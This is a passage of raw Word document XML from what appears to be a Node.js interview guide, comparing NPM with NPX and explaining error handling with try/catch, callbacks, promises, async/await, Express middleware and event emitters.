          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Global Packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02338A45" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Requires global installation of CLI tools if used across projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C3251" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPX</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Eliminates the need for global installations, allowing you to run a tool directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C32F837" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A691598" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used to install and manage project dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E4A39" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPX</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used to run package binaries easily, especially useful for one-off commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091C16BE" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009EF65F"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13" w:name="_Toc178383196"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q13. How to handle errors in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2E8FB8C2"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Handling errors effectively is crucial in Node.js, given its asynchronous and non-blocking nature. Proper error handling ensures that your application remains robust, maintainable, and resilient to unexpected issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAFC178"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Types of Errors in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DEE04" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="656"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Synchronous Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC0C59F" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="656"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Errors that occur during the execution of synchronous code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A717B" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="656"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>These can be caught using try...catch blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309033F5" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="656"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Asynchronous Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2726014B" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="656"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Errors that occur during the execution of asynchronous code, such as callbacks, promises, or async/await.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780C5211" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="656"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>These require specific handling strategies, as try...catch cannot be used directly with callbacks or asynchronous functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB53C62"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Synchronous Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DA25C9"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For synchronous code, you can handle errors using try...catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E873F9"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of Synchronous Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD784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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFBE91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Code that might throw an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442B465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let result = someFunction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B367004"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console.log(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02741F5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catch (err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE26CC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Handle the error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873B58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console.error('An error occurred:', err.message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09005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165E2DD2"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Asynchronous Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36109793"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1. Callbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3593A46A"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In Node.js, callbacks follow the "error-first" pattern, where the first argument to the callback function is an error object (or null if there’s no error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C175151"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with Error-First Callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A547D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fs = require('fs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C2100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3EE696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Reading a file asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4DCA5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fs.readFile('example.txt', 'utf8', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F57469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(err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123CCFE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Handle the error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4201773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console.error('Error reading file:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48253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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C8A8D0"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24011AB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96BA31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Process the file content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115BBE4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console.log('File content:', data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079FBAB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15CA7079" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The err argument is checked, and if it's not null, the error is handled appropriately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124986B6"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2. Promises:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C1A2CD"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Promises provide a cleaner way to handle asynchronous errors. You can use .catch() to handle errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048F4C2C"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with Promises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A6722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readFile = (filename) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247702B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new Promise((resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AFDC5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fs.readFile(filename, 'utf8', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A5598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(err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0768CBB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reject(err); // Reject the promise with the error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5CEBD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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D1BE8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resolve(data); // Resolve the promise with the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8705D4"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CF7661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A15470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D53490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3F25C88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278A5F8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readFile('example.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027F5CEB"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.then(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1C508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console.log('File content:', data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384B1F5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4FF4A84"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.catch(err =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DA7CF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console.error('Error reading file:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F94030"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2D204236" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="658"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: .catch() is used to handle any errors that occur during the execution of the promise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4998E41D"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3. Async/Await:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097405DA"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Async/await allows you to write asynchronous code that looks synchronous, making error handling with try...catch more straightforward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43114374"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with Async/Await</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54383F7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readFileAsync = async (filename) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE8878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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA4668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data = await fs.promises.readFile(filename, 'utf8');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FE98D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console.log('File content:', data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72397E3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catch (err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ABDA3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console.error('Error reading file:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DF993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E06C5E0"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lastRenderedPageBreak/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E200D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2D47D3A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readFileAsync('example.txt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378ED448" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use try...catch to handle errors in an async function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D728D3E"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Centralized Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA1817B"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For larger applications, you may want to centralize your error handling to avoid repeating code and to ensure consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F10C33"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1. Middleware for Express.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6DC311"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In Express.js applications, you can use middleware to centralize error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E1220A"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of Centralized Error Handling in Express</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7839C3A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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B14DE20"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app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9A4B7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C4DE5E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Some routes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7379A84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app.get('/', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3AACE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throw new Error('Something went wrong!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F08CBD9"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3F81362C"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B081704"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app.get('/async', async (req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6067D6E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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC760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data = await someAsyncOperation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539763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res.send(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5877E26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catch (err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A34A65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next(err); // Pass the error to the error handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF12A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28DC6F5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2BA7ECB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64310457"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Error-handling middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478071F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app.use((err, req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A1144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console.error(err.stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F94CCA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res.status(500).send('Something broke!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CE89A"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24F4616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E492680"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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756C8ED"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console.log('Server running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0767106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17EE07C2" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error-Handling Middleware</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The error-handling middleware captures any errors thrown in the route handlers and sends an appropriate response to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC4F02"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2. Event Emitters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5FB5AC" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js has a built-in EventEmitter class. If an error occurs in an event emitter, it should be handled to avoid crashing the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C97F4B"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Example with Event Emitters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D10B2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EventEmitter = require('events');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A55FB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myEmitter = new EventEmitter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5597B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7AA361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Error event listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E954A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myEmitter.on('error', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D60D3F8"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console.error('An error occurred:', err.message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B0BA5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44EA89E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74BA4ADF"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Trigger an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D73DE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myEmitter.emit('error', new Error('Something went wrong!'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416FA31C" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Event</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handle the error event to prevent the application from crashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D1463B"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Best Practices for Error Handling in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61803633" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Always Handle Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Whether in callbacks, promises, or async/await, always ensure that errors are handled. Unhandled errors can cause your application to crash or behave unexpectedly.</w:t>
      </w:r>
    </w:p>
